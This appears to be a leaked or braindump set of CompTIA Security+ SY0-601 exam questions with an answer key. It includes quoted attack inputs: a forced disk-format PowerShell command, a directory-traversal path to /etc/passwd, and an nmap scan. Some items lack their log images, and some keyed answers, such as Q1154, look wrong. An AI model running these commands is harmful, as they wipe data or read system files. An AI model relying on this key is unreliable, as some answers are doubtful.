An analyst is concerned about data leaks and wants to restrict access to internet services to
authorized users only. The analyst also wants to control the actions each user can perform on
each service. Which of the following would be the best technology for the analyst to consider
Implementing?
A.
B.
C.
D.
DLP
VPC
CASB
Content filtering
Answer: C
QUESTION 1063
A grocery store is expressing security and reliability concerns regarding the on-site backup
strategy currently being performed by locally attached disks. The main concerns are the physical
security of the backup media and the durability of the data stored on these devices. Which of the
following is a cost-effective approach to address these concerns?
A. Enhance resiliency by adding a hardware RAID.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
363
B. Move data to a tape library and store the tapes off-site.
C. Install a local network-attached storage.
D. Migrate to a cloud backup solution.
Answer: D
QUESTION 1064
A security engineer needs to recommend a solution to defend against malicious actors misusing
protocols and being allowed through network defenses. Which of the following will the engineer
most likely recommend?
A.
B.
C.
D.
A content filter
A WAF
A next-generation firewall
An IDS
Answer: C
QUESTION 1065
A company's legal department drafted sensitive documents in a SaaS application and wants to
ensure the documents cannot be accessed by individuals in high-risk countries. Which of the
following is the most effective way to limit this access?
A.
B.
C.
D.
Data masking
Encryption
Geolocation policy
Data sovereignty regulation
Answer: C
QUESTION 1066
An organization suffered numerous multiday power outages at its current location. The Chief
Executive Officer wants to create a disaster recovery strategy to resolve this issue. Which of the
following options offer low-cost solutions? (Choose two.)
A.
B.
C.
D.
E.
F.
Warm site
Generator
Hot site
Cold site
Cloud backups
UPS
Answer: DE
QUESTION 1067
A security analyst is reviewing the following logs:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
364
Which of the following attacks is most likely occurring?
A.
B.
C.
D.
Password spraying
Account forgery
Pass-the-hash
Brute-force
Answer: A
QUESTION 1068
A security analyst discovers that one of the web APIs is being abused by an unknown third party.
Logs indicate that the third party is attempting to manipulate the parameters being passed to the
API endpoint. Which of the following solutions would best help to protect against the attack?
A.
B.
C.
D.
DLP
SIEM
NIDS
WAF
Answer: D
QUESTION 1069
An application owner reports suspicious activity on an internal financial application from various
internal users within the past 14 days. A security analyst notices the following:
- Financial transactions were occurring during irregular time frames and outside of business hours
by unauthorized users.
- Internal users in question were changing their passwords frequently during that time period.
- A jump box that several domain administrator users use to connect to remote devices was
recently compromised.
- The authentication method used in the environment is NTLM.
Which of the following types of attacks is most likely being used to gain unauthorized access?
A.
B.
C.
D.
Pass-the-hash
Brute-force
Directory traversal
Replay
Answer: A
QUESTION 1070
During an incident, an EDR system detects an increase in the number of encrypted outbound
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
365
connections from multiple hosts. A firewall is also reporting an increase in outbound connections
that use random high ports. An analyst plans to review the correlated logs to find the source of
the incident. Which of the following tools will best assist the analyst?
A.
B.
C.
D.
A vulnerability scanner
A NGFW
The Windows Event Viewer
A SIEM
Answer: D
QUESTION 1071
A company recently suffered a breach in which an attacker was able to access the internal mail
servers and directly access several user inboxes. A large number of email messages were later
posted online. Which of the following would best prevent email contents from being released
should another breach occur?
A.
B.
C.
D.
Implement S/MIME to encrypt the emails at rest.
Enable full disk encryption on the mail servers.
Use digital certificates when accessing email via the web.
Configure web traffic to only use TLS-enabled channels.
Answer: A
QUESTION 1072
A company hired a consultant to perform an offensive security assessment covering penetration
testing and social engineering. Which of the following teams will conduct this assessment
activity?
A.
B.
C.
D.
White
Purple
Blue
Red
Answer: D
QUESTION 1073
Which of the following exercises should an organization use to improve its incident response
process?
A.
B.
C.
D.
Tabletop
Replication
Failover
Recovery
Answer: A
QUESTION 1074
An attacker is attempting to harvest user credentials on a client's website. A security analyst
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
366
notices multiple attempts of random usernames and passwords. When the analyst types in a
random username and password, the logon screen displays the following message:
The username you entered does not exist.
Which of the following should the analyst recommend be enabled?
A.
B.
C.
D.
Input valuation
Obfuscation
Error handling
Username lockout
Answer: C
QUESTION 1075
An organization disabled unneeded services and placed a firewall in front of a business-critical
legacy system. Which of the following best describes the actions taken by the organization?
A.
B.
C.
D.
Exception
Segmentation
Risk transfer
Compensating controls
Answer: D
QUESTION 1076
Which of the following describes the ability of code to target a hypervisor from inside a guest OS?
A.
B.
C.
D.
E.
Fog computing
VM escape
Software-defined networking
Image forgery
Container breakout
Answer: B
QUESTION 1077
A local server recently crashed and the team is attempting to restore the server from a backup.
During the restore process, the team notices the file size of each daily backup is large and will run
out of space at the current rate. The current solution appears to do a full backup every night.
Which of the following would use the least amount of storage space for backups?
A.
B.
C.
D.
A weekly, incremental backup with daily differential backups
A weekly, full backup with daily snapshot backups
A weekly, full backup with daily differential backups
A weekly, full backup with daily incremental backups
Answer: D
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
367
QUESTION 1078
A security analyst discovers several jpg photos from a cellular phone during a forensics
investigation involving a compromised system. The analyst runs a forensics tool to gather file
metadata. Which of the following would be part of the images if all the metadata is still intact?
A.
B.
C.
D.
The GPS location
When the file was deleted
The total number of print jobs
The number of copies made
Answer: A
QUESTION 1079
A financial analyst is expecting an email containing sensitive information from a client. When the
email arrives the analyst receives an error and is unable to open the encrypted message. Which
of the following is the most likely cause of the issue?
A.
B.
C.
D.
The S/MIME plug-in is not enabled
The SSL certificate has expired
Secure IMAP was not implemented
POP3S is not supported
Answer: A
QUESTION 1080
A company develops a complex platform that is composed of a single application. After several
issues with upgrades, the systems administrator recommends breaking down the application into
unique, independent modules. Which of the following best identifies the systems administrator's
recommendation?
A.
B.
C.
D.
Virtualization
Serverless
Microservices
API gateway
Answer: C
QUESTION 1081
Which of the following would be the best way to block unknown programs from executing?
A.
B.
C.
D.
Access control list
Application allow list
Host-based firewall
DLP solution
Answer: B
QUESTION 1082
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
368
A company is planning to install a guest wireless network so visitors will be able to access the
internet. The stakeholders want the network to be easy to connect to so time is not wasted during
meetings. The WAPs are configured so that power levels and antennas cover only the
conference rooms where visitors will attend meetings. Which of the following would best protect
the company's internal wireless network against visitors accessing company resources?
A. Configure the guest wireless network to be on a separate VLAN from the company's internal
wireless network.
B. Change the password for the guest wireless network every month.
C. Decrease the power levels of the access points for the guest wireless network.
D. Enable WPA2 using 802.1X for logging on to the guest wireless network.
Answer: A
QUESTION 1083
An organization relies on third-party videoconferencing to conduct daily business. Recent security
changes now require all remote workers to utilize a VPN to corporate resources. Which of the
following would best maintain high-quality videoconferencing while minimizing latency when
connected to the VPN?
A.
B.
C.
D.
Using geographic diversity to have VPN terminators closer to end users
Utilizing split tunneling so only traffic for corporate resources is encrypted
Purchasing higher bandwidth connections to meet the increased demand
Configuring QoS properly on the VPN accelerators
Answer: B
QUESTION 1084
A security analyst is scanning a company's public network and discovers a host is running a
remote desktop that can be used to access the production network. Which of the following
changes should the security analyst recommend?
A.
B.
C.
D.
Changing the remote desktop port to a non-standard number
Setting up a VPN and placing the jump server inside the firewall
Using a proxy for web connections from the remote desktop server
Connecting the remote server to the domain and increasing the password length
Answer: B
QUESTION 1085
A company recently experienced a major breach. An investigation concludes that customer credit
card data was stolen and exfiltrated through a dedicated business partner connection to a vendor,
who is not held to the same security control standards. Which of the following is the most likely
source of the breach?
A.
B.
C.
D.
Side channel
Supply chain
Cryptographic downgrade
Malware
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
369
Answer: B
QUESTION 1086
A company would like to provide flexibility for employees on device preference. However, the
company is concerned about supporting too many different types of hardware. Which of the
following deployment models will provide the needed flexibility with the greatest amount of control
and security over company data and infrastructure?
A.
B.
C.
D.
BYOD
VDI
COPE
CYOD
Answer: B
QUESTION 1087
Which of the following threat actors is most likely to be motivated by ideology?
A.
B.
C.
D.
E.
Business competitor
Hacktivist
Criminal syndicate
Script kiddie
Disgruntled employee
Answer: B
QUESTION 1088
A user would like to install software and features that are not available with a mobile device's
default software. Which of the following would all the user to install unauthorized software and
enable new features?
A.
B.
C.
D.
SQLi
Cross-site scripting
Jailbreaking
Side loading
Answer: C
QUESTION 1089
A user downloaded an extension for a browser and the user's device later became infected. The
analyst who is investigating the incident saw various logs where the attacker was hiding activity
by deleting data. The following was observed running:
New-Partition -DiskNumber 2 -UseMaximumSize -AssignDriveLetter C| Format-Volume DriveLetter C - FileSystemLabel "New"-FileSystem NTFS - Full -Force -Confirm:$false |
Which of the following is the malware using to execute the attack?
A. PowerShell
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
370
B. Python
C. Bash
D. Macros
Answer: A
QUESTION 1090
An organization recently acquired an ISO 27001 certification. Which of the following would most
likely be considered a benefit of this certification?
A.
B.
C.
D.
E.
It allows for the sharing of digital forensics data across organizations.
It provides insurance in case of a data breach
It provides complimentary training and certification resources to IT security staff
It certifies the organization can work with foreign entities that require a security clearance
It assures customers that the organization meets security standards
Answer: E
QUESTION 1091
A junior security analyst is reviewing web server logs and identifies the following pattern in the log
file:
http://comptia.org/../../../etc/passwd
Which of the following types of attacks is being attempted and how can it be mitigated?
A.
B.
C.
D.
XSS; implement a SIEM
CSRF; implement an IPS
Directory traversal; implement a WAF
SQL injection; implement an IDS
Answer: C
QUESTION 1092
A security professional wants to enhance the protection of a critical environment that is used to
store and manage a company's encryption keys. The selected technology should be tamper
resistant. Which of the following should the security professional implement to achieve the goal?
A.
B.
C.
D.
DLP
HSM
CA
FIM
Answer: B
QUESTION 1093
Which of the following is the correct order of volatility from most to least volatile?
A. Memory, temporary filesystems, routing tables, disk, network storage
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
371
B. Cache memory, temporary filesystems, disk, archival media
C. Memory, disk temporary filesystems, cache, archival media
D. Cache, disk, temporary filesystems, network storage, archival media
Answer: B
QUESTION 1094
A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase
of ransomware-as-a-service in a report to the management team. Which of the following best
describes the threat actor in the CISO's report?
A.
B.
C.
D.
Insider threat
Hacktivist
Nation-state
Organized crime
Answer: D
QUESTION 1095
Which of the following agreements defines response time, escalation points, and performance
metrics?
A.
B.
C.
D.
BPA
MOA
NDA
SLA
Answer: D
QUESTION 1096
A bakery has a secret recipe that it wants to protect. Which of the following objectives should be
added to the company's security awareness training?
A.
B.
C.
D.
Insider threat detection
Risk analysis
Phishing awareness
Business continuity planning
Answer: A
QUESTION 1097
Which of the following must be considered when designing a high-availability network? (Choose
two.)
A.
B.
C.
D.
E.
Ease of recovery
Ability to patch
Physical isolation
Responsiveness
Attack surface
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
372
F. Extensible authentication
Answer: AD
QUESTION 1098
Which of the following strategies shifts risks that are not covered in an organization's risk
strategy?
A.
B.
C.
D.
Risk transference
Risk avoidance
Risk mitigation
Risk acceptance
Answer: A
QUESTION 1099
A dynamic application vulnerability scan identified that code injection could be performed using a
web form. Which of the following will be the best remediation to prevent this vulnerability?
A.
B.
C.
D.
Implement input validations
Deploy MFA
Utilize a WAF
Configure HIPS
Answer: A
QUESTION 1100
A security administrator needs a method to secure data in an environment that includes some
form of checks so that the administrator can track any changes. Which of the following should the
administrator set up to achieve this goal?
A.
B.
C.
D.
SPF
GPO
NAC
FIM
Answer: D
QUESTION 1101
An analyst is working on an email security incident in which the target opened an attachment
containing a worm. The analyst wants to implement mitigation techniques to prevent further
spread. Which of the following is the best course of action for the analyst to take?
A.
B.
C.
D.
Apply a DLP solution
Implement network segmentation
Utilize email content filtering.
Isolate the infected attachment
Answer: B
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
373
QUESTION 1102
Sales team members have been receiving threatening voicemail messages and have reported
these incidents to the IT security team. Which of the following would be MOST appropriate for the
IT security team to analyze?
A.
B.
C.
D.
Access control
Syslog
Session Initiation Protocol traffic logs
Application logs
Answer: C
QUESTION 1103
Which of the following can be used to calculate the total loss expected per year due to a threat
targeting an asset?
A.
B.
C.
D.
EF x asset value
ALE / SLE
MTBF x impact
SLE x ARO
Answer: D
QUESTION 1104
A security engineer is hardening existing solutions to reduce application vulnerabilities. Which of
the following solutions should the engineer implement FIRST? (Choose two.)
A.
B.
C.
D.
E.
F.
G.
Auto-update
HTTP headers
Secure cookies
Third-party updates
Full disk encryption
Sandboxing
Hardware encryption
Answer: AF
QUESTION 1105
Which of the following authentication methods is considered to be the LEAST secure?
A.
B.
C.
D.
TOTP
SMS
HOTP
Token key
Answer: B
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
374
QUESTION 1106
Employees in the research and development business unit receive extensive training to ensure
they understand how to best protect company data. Which of the following is the type of data
these employees are most likely to use in day to-day work activities?
A.
B.
C.
D.
Encrypted
Intellectual property
Critical
Data in transit
Answer: B
QUESTION 1107
An audit report indicates multiple suspicious attempts to access company resources were made.
These attempts were not detected by the company. Which of the following would be the best
solution to implement on the company's network?
A.
B.
C.
D.
Intrusion prevention system
Proxy server
Jump server
Security zones
Answer: A
QUESTION 1108
An administrator identifies some locations on the third floor of the building that have a poor
wireless signal Multiple users confirm the incident and report it is not an isolated event. Which of
the following should the administrator use to find the areas with a poor or non-existent wireless
signal?
A.
B.
C.
D.
Heat map
Input validation
Site survey
Embedded systems
Answer: C
QUESTION 1109
Which of the following has been implemented when a host-based firewall on a legacy Linux
system allows connections from only specific internal IP addresses?
A.
B.
C.
D.
Compensating control
Network segmentation
Transfer of risk
SNMP traps
Answer: B
QUESTION 1110
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
375
An attacker tricks a user into providing confidential information. Which of the following describes
this form of malicious reconnaissance?
A.
B.
C.
D.
Phishing
Social engineering
Typosquatting
Smishing
Answer: B
QUESTION 1111
A large bank with two geographically dispersed data centers is concerned about major power
disruptions at both locations. Every day each location experiences very brief outages that last for
a few seconds. However, during the summer a high risk of intentional under-voltage events that
could last up to an hour exists, particularly at one of the locations near an industrial smelter.
Which of the following is the best solution to reduce the risk of data loss?
A.
B.
C.
D.
Dual supply
Generator
PDU
Daily backups
Answer: B
QUESTION 1112
Which of the following examples would be best mitigated by input sanitization?
A.
B. nmap -p- 10.11.1.130
C. Email message: "Click this link to get your free gift card."
D. Browser message: "Your connection is not private."
Answer: A
QUESTION 1113
An organization would like to store customer data on a separate part of the network that is not
accessible to users on the mam corporate network. Which of the following should the
administrator use to accomplish this goal?
A.
B.
C.
D.
Segmentation
Isolation
Patching
Encryption
Answer: B
QUESTION 1114
A company is adding a clause to its AUP that states employees are not allowed to modify the
operating system on mobile devices. Which of the following vulnerabilities is the organization
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
376
addressing?
A.
B.
C.
D.
Cross-site scripting
Buffer overflow
Jailbreaking
Side loading
Answer: C
QUESTION 1115
A company is expanding its threat surface program and allowing individuals to security test the
company's internet-facing application. The company will compensate researchers based on the
vulnerabilities discovered. Which of the following best describes the program the company is
setting up?
A.
B.
C.
D.
Open-source intelligence
Bug bounty
Red team
Penetration testing
Answer: B
QUESTION 1116
An organization experiences a cybersecurity incident involving a command-and-control server.
Which of the following logs should be analyzed to identify the impacted host? (Choose two.)
A.
B.
C.
D.
E.
F.
Application
Authentication
Error
Network
Firewall
System
Answer: DE
QUESTION 1117
An administrator assists the legal and compliance team with ensuring information about customer
transactions is archived for the proper time period. Which of the following data policies is the
administrator carrying out?
A.
B.
C.
D.
E.
Compromise
Retention
Analysis
Transfer
Inventory
Answer: B
QUESTION 1118
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
377
While troubleshooting a firewall configuration, a technician determines that a "deny any" policy
should be added to the bottom of the ACL. The technician updates the policy, but the new policy
causes several company servers to become unreachable. Which of the following actions would
prevent this issue?
A. Documenting the new policy in a change request and submitting the request to change
management
B. Testing the policy in a non-production environment before enabling the policy in the production
network
C. Disabling any intrusion prevention signatures on the "deny any" policy prior to enabling the new
policy
D. Including an "allow any" policy above the "deny any" policy
Answer: B
QUESTION 1119
Which of the following security concepts should an e-commerce organization apply for protection
against erroneous purchases?
A.
B.
C.
D.
Privacy
Availability
Integrity
Confidentiality
Answer: C
QUESTION 1120
Which of the following threat vectors would appear to be the most legitimate when used by a
malicious actor to impersonate a company?
A.
B.
C.
D.
Phone call
Instant message
Email
Text message
Answer: C
QUESTION 1121
Which of the following should a security administrator adhere to when setting up a new set of
firewall rules?
A.
B.
C.
D.
Disaster recovery plan
Incident response procedure
Business continuity plan
Change management procedure
Answer: D
QUESTION 1122
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
378
During an engagement, penetration testers left USB keys that contained specially crafted
malware in the company's parking lot. A couple days later, the malware contacted the commandand-control server, giving the penetration testers unauthorized access to the company endpoints.
Which of the following will most likely be a recommendation in the engagement report?
A.
B.
C.
D.
Conduct an awareness campaign on the usage of removable media.
Issue a user guidance program focused on vishing campaigns.
Implement more complex password management practices.
Establish a procedure on identifying and reporting suspicious messages.
Answer: A
QUESTION 1123
A company recently experienced a significant data loss when proprietary information was leaked
to a competitor. The company took special precautions by using proper labels; however, email
filter logs do not have any record of the incident. An investigation confirmed the corporate
network was not breached, but documents were downloaded from an employee's COPE tablet
and passed to the competitor via cloud storage. Which of the following is the best mitigation
strategy to prevent this from happening in the future?
A.
B.
C.
D.
User training
CASB
MDM
EDR
Answer: B
QUESTION 1124
Which of the following roles, according to the shared responsibility model, is responsible for
securing the company's database in an IaaS model for a cloud environment?
A.
B.
C.
D.
Client
Third-party vendor
Cloud provider
OBA
Answer: A
QUESTION 1125
Which of the following tools can assist with detecting an employee who has accidentally emailed
a file containing a customer's PII?
A.
B.
C.
D.
SCAP
NetFlow
Antivirus
DLP
Answer: D
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
379
QUESTION 1126
A bank insists all of its vendors must prevent data loss on stolen laptops. Which of the following
strategies is the bank requiring?
A.
B.
C.
D.
Encryption at rest
Masking
Data classification
Permission restrictions
Answer: A
QUESTION 1127
After a recent vulnerability scan, a security engineer needs to harden the routers within the
corporate network. Which of the following is the most appropriate to disable?
A.
B.
C.
D.
Console access
Routing protocols
VLANs
Web-based administration
Answer: D
QUESTION 1128
A company requires hard drives to be securely wiped before sending decommissioned systems
to recycling. Which of the following best describes this policy?
A.
B.
C.
D.
Enumeration
Sanitization
Destruction
Inventory
Answer: B
QUESTION 1129
An attacker posing as the Chief Executive Officer calls an employee and instructs the employee
to buy gift cards. Which of the following techniques is the attacker using?
A.
B.
C.
D.
Smishing
Phishing
Impersonating
Vishing
Answer: C
QUESTION 1130
During the onboarding process, an employee needs to create a password for an intranet account.
The password must include ten characters, numbers, and letters, and two special characters.
Once the password is created, the company will grant the employee access to other companyowned websites based on the intranet profile. Which of the following access management
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
380
concepts is the company most likely using to safeguard intranet accounts and grant access to
multiple sites based on a user's intranet account? (Choose two.)
A.
B.
C.
D.
E.
F.
Federation
Identity proofing
Password complexity
Default password changes
Password manager
Open authentication
Answer: AC
QUESTION 1131
A manufacturing organization wants to control and monitor access from the internal business
network to the segregated production network, while ensuring minimal exposure of the production
network to devices. Which of the following solutions would best accomplish this goal?
A.
B.
C.
D.
Proxy server
NGFW
WAF
Jump server
Answer: D
QUESTION 1132
Which of the following best describes a use case for a DNS sinkhole?
A. Attackers can see a DNS sinkhole as a highly valuable resource to identify a company's domain
structure.
B. A DNS sinkhole can be used to draw employees away from known-good websites to malicious
ones owned by the attacker.
C. A DNS sinkhole can be used to capture traffic to known-malicious domains used by attackers.
D. A DNS sinkhole can be set up to attract potential attackers away from a company's network
resources.
Answer: C
QUESTION 1133
Which of the following explains why an attacker cannot easily decrypt passwords using a rainbow
table attack?
A.
B.
C.
D.
Digital signatures
Salting
Hashing
Perfect forward secrecy
Answer: B
QUESTION 1134
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
381
A company reduced the area utilized in its data center by creating virtual networking through
automation and by creating provisioning routes and rules through scripting. Which of the following
does this example describe?
A.
B.
C.
D.
IaC
MSSP
Containers
SaaS
Answer: A
QUESTION 1135
Historically, a company has had issues with users plugging in personally owned removable media
devices into corporate computers. As a result, the threat of malware incidents is almost constant.
Which of the following would best help prevent the malware from being installed on the
computers?
A.
B.
C.
D.
AUP
NGFW
DLP
EDR
Answer: D
QUESTION 1136
While investigating a recent security breach, an analyst finds that an attacker gained access by
SQL injection through a company website. Which of the following should the analyst recommend
to the website developers to prevent this from reoccurring?
A.
B.
C.
D.
Secure cookies
Input sanitization
Code signing
Blocklist
Answer: B
QUESTION 1137
Which of the following best describes the risk that is present once mitigations are applied?
A.
B.
C.
D.
Control risk
Residual risk
Inherent risk
Risk awareness
Answer: B
QUESTION 1138
A security architect at a large, multinational organization is concerned about the complexities and
overhead of managing multiple encryption keys securely in a multicloud provider environment.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
382
The security architect is looking for a solution with reduced latency to allow the incorporation of
the organization's existing keys and to maintain consistent, centralized control and management
regardless of the data location. Which of the following would best meet the architect's objectives?
A.
B.
C.
D.
Trusted Platform Module
IaaS
HSMaaS
PaaS
Answer: C
Explanation:
HSM as a Service (HSMaaS), Hardware security modules (HSMs) are fortified, tamper-resistant
hardware components that produce, safeguard, and manage keys for encrypting and decrypting
data and establishing digital signatures and certificates.
QUESTION 1139
Which of the following best represents an application that does not have an on-premises
requirement and is accessible from anywhere?
A.
B.
C.
D.
E.
PaaS
Hybrid cloud
Private cloud
IaaS
SaaS
Answer: E
QUESTION 1140
During an investigation, events from two affected servers in the same subnetwork occurred at the
same time:
Server 1: 192.168.10.1 [01/Apr/2021:06:00:00 PST] SAN access denied for user 'admin'
Server 2: 192.168.10.6 [01/Apr/2021:06:01:01 CST] SAN access successful for user 'admin'
Which of the following should be consistently configured to prevent the issue seen in the logs?
A.
B.
C.
D.
Geolocation
TOTP
NTP
MFA
Answer: C
QUESTION 1141
The most recent vulnerability scan flagged the domain controller with a critical vulnerability. The
systems administrator researched the vulnerability and discovered the domain controller does not
run the associated application with the vulnerability. Which of the following steps should the
administrator take next?
A. Ensure the scan engine is configured correctly.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
383
B. Apply a patch to the domain controller.
C. Research the CVE.
D. Document this as a false positive.
Answer: D
QUESTION 1142
A company has decided to move its operations to the cloud. It wants to utilize technology that will
prevent users from downloading company applications for personal use, restrict data that is
uploaded, and have visibility into which applications are being used across the company. Which
of the following solutions will best meet these requirements?
A.
B.
C.
D.
An NGFW
A CASB
Application whitelisting
An NG-SWG
Answer: B
Explanation:
A Cloud Access Security Broker (CASB) would best meet the requirements stated in the
scenario. CASBs can provide visibility into which cloud applications are being used across a
company, restrict data that is uploaded to the cloud, and prevent unauthorized downloading of
company applications for personal use. They act as a gatekeeper, allowing the organization to
extend its security policies beyond its own infrastructure. CASBs provide features like visibility,
data security, threat protection, and compliance, ensuring secure and only authorized use of
cloud services by employees.
QUESTION 1143
An internet company has created a new collaboration application. To expand the user base, the
company wants to implement an option that allows users to log in to the application with the
credentials of other popular websites. Which of the following should the company implement?
A.
B.
C.
D.
SSO
CHAP
802.1x
OpenID
Answer: D
Explanation:
It's using sign-in credentials from OTHER popular websites. An example of this would be logging
into CompTIA using a google/gmail account. OpenID uses SSO. However, SSO is more broad
and I feel OpenID perfectly fits this scenario.
QUESTION 1144
Following a prolonged data center outage that affected web-based sales, a company has decided
to move its operations to a private cloud solution. The security team has received the following
requirements:
- There must be visibility into how teams are using cloud-based
services.
- The company must be able to identify when data related to payment
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
384
cards is being sent to the cloud.
- Data must be available regardless of the end user's geographic
location.
- Administrators need a single pane-of-glass view into traffic and
trends.
Which of the following should the security analyst recommend?
A.
B.
C.
D.
Create firewall rules to restrict traffic to other cloud service providers.
Install a DLP solution to monitor data in transit.
Implement a CASB solution.
Configure a web-based content filter.
Answer: C
QUESTION 1145
A recent malware outbreak across a subnet included successful rootkit installations on many
PCs, ensuring persistence by rendering remediation efforts ineffective. Which of the following
would best detect the presence of a rootkit in the future?
A.
B.
C.
D.
FDE
NIDS
EDR
DLP
Answer: C
Explanation:
EDR (Endpoint Detection and Response) is the most suitable solution among the given options
for detecting the presence of a rootkit. EDR solutions continuously monitor and collect data from
endpoints, looking for suspicious activities and behavior patterns that might indicate the presence
of malware, including rootkits. They also provide tools for investigating and responding to security
incidents, making them effective for dealing with sophisticated threats that can evade traditional
antivirus solutions.
QUESTION 1146
An organization is building a single virtual environment that will host customer applications and
data that require availability at all times. The data center that is hosting the environment will
provide generator power and ISP services. Which of the following is the best solution to support
the organization's requirement?
A.
B.
C.
D.
NIC teaming
Cloud backups
A load balancer appliance
UPS
Answer: D
Explanation:
While NIC teaming, cloud backups, and load balancer appliances are all important for different
aspects of an IT infrastructure, they do not directly address the need for continuous power
availability, which is the primary concern in this scenario. UPS, in combination with backup
generators and ISP services, helps ensure that the data center remains operational even during
power-related issues.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
385
QUESTION 1147
A new company wants to avoid channel interference when building a WLAN. The company needs
to know the radio frequency behavior, identify dead zones, and determine the best place for
access points. Which of the following should be done first?
A.
B.
C.
D.
Configure heat maps.
Utilize captive portals.
Conduct a site survey.
Install Wi-Fi analyzers.
Answer: C
QUESTION 1148
The following IP information was provided to internal auditors to help assess organizational
security:
Which of the following tools would most likely be used to perform network reconnaissance and
help understand what is accessible to all users? (Choose two.)
A.
B.
C.
D.
E.
F.
ipconfig
ping
chmod
netstat
traceroute
route
Answer: BE
QUESTION 1149
A software company adopted the following processes before releasing software to production:
- Peer review
- Static code scanning
- Signing
A considerable number of vulnerabilities are still being detected when code is executed on
production. Which of the following security tools can improve vulnerability detection on this
environment?
A.
B.
C.
D.
File integrity monitoring for the source code
Dynamic code analysis tool
Encrypted code repository
Endpoint detection and response solution
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
386
Answer: B
QUESTION 1150
A security analyst needs to harden access to a network. One of the requirements is to
authenticate users with smart cards. Which of the following should the analyst enable to best
meet this requirement?
A.
B.
C.
D.
CHAP
PEAP
MS-CHAPv2
EAP-TLS
Answer: D
Explanation:
EAP-TLS is a strong and secure authentication method that involves the use of digital certificates,
typically stored on smart cards, for user authentication. It requires the user to present a valid
certificate, which is verified by the authentication server, providing a high level of security.
QUESTION 1151
A penetration-testing firm is working with a local community bank to create a proposal that best
fits the needs of the bank. The bank's information security manager would like the penetration
test to resemble a real attack scenario, but it cannot afford the hours required by the penetrationtesting firm. Which of the following would best address the bank's desired scenario and budget?
A. Engage the penetration-testing firm's rea-team services to fully mimic possible attackers.
B. Give the penetration tester data diagrams of core banking applications in a known-environment
test.
C. Limit the scope of the penetration test to only the system that is used for teller workstations.
D. Provide limited networking details in a partially known-environment test to reduce reconnaissance
efforts.
Answer: D
QUESTION 1152
A security analyst is reviewing SIEM logs during an ongoing attack and notices the following:
Which of the following best describes the type of attack?
A.
B.
C.
D.
SQLi
CSRF
API attacks
Directory traversal
Answer: D
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
387
QUESTION 1153
A certificate vendor notified a company that recently invalidated certificates may need to be
updated. Which of the following mechanisms should a security administrator use to determine
whether the certificates installed on the company's machines need to be updated?
A.
B.
C.
D.
SCEP
OCSP
CSR
CRL
Answer: D
Explanation:
From a practical standpoint, an administrator would use automation to compare all existing
certificates with the revocation list, but potentially they could also script to OCSP per each
certificate in the environment. Either option seem valid, but CRL seems the better option from
enterprise scan perspective.
QUESTION 1154
A recent vulnerability scan revealed multiple servers have non-standard ports open for
applications that are no longer in use. The security team is working to ensure all devices are
patched and hardened. Which of the following would the security team perform to ensure the task
is completed with minimal impact to production?
A.
B.
C.
D.
Enable HIDS on all servers and endpoints.
Disable unnecessary services.
Configure the deny list appropriately on the NGFW.
Ensure the antivirus is up to date.
Answer: A
QUESTION 1155
An employee fell for a phishing scam, which allowed an attacker to gain access to a company
PC. The attacker scraped the PC's memory to find other credentials. Without cracking these
credentials, the attacker used them to move laterally through the corporate network. Which of the
following describes this type of attack?
A.
B.
C.
D.
Privilege escalation
Buffer overflow
SQL injection
Pass-the-hash
Answer: D
Explanation:
Unlike other credential theft attacks, a pass the hash attack does not require the attacker to know
or crack the password to gain access to the system. Rather, it uses a stored version of the
password to initiate a new session.
QUESTION 1156
Which of the following is a common source of unintentional corporate credential leakage in cloud
environments?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
388
A.
B.
C.
D.
E.
Code repositories
Dark web
Threat feeds
State actors
Vulnerability databases
Answer: A
Explanation:
Code repositories: Developers sometimes inadvertently include sensitive information, such as
API keys, passwords, and other credentials, in their code. When this code is pushed to public
repositories (e.g., GitHub, GitLab), those credentials can be exposed to the world, leading to
potential credential leakage.
QUESTION 1157
A company is designing the layout of a new data center so it will have an optimal environmental
temperature. Which of the following must be included? (Choose two.)
A.
B.
C.
D.
E.
F.
An air gap
A cold aisle
Removable doors
A hot aisle
An IoT thermostat
A humidity monitor
Answer: BD
QUESTION 1158
A privileged user at a company stole several proprietary documents from a server. The user also
went into the log files and deleted all records of the incident. The systems administrator has just
informed investigators that other log files are available for review. Which of the following did the
administrator most likely configure that will assist the investigators?
A.
B.
C.
D.
Memory dumps
The syslog server
The application logs
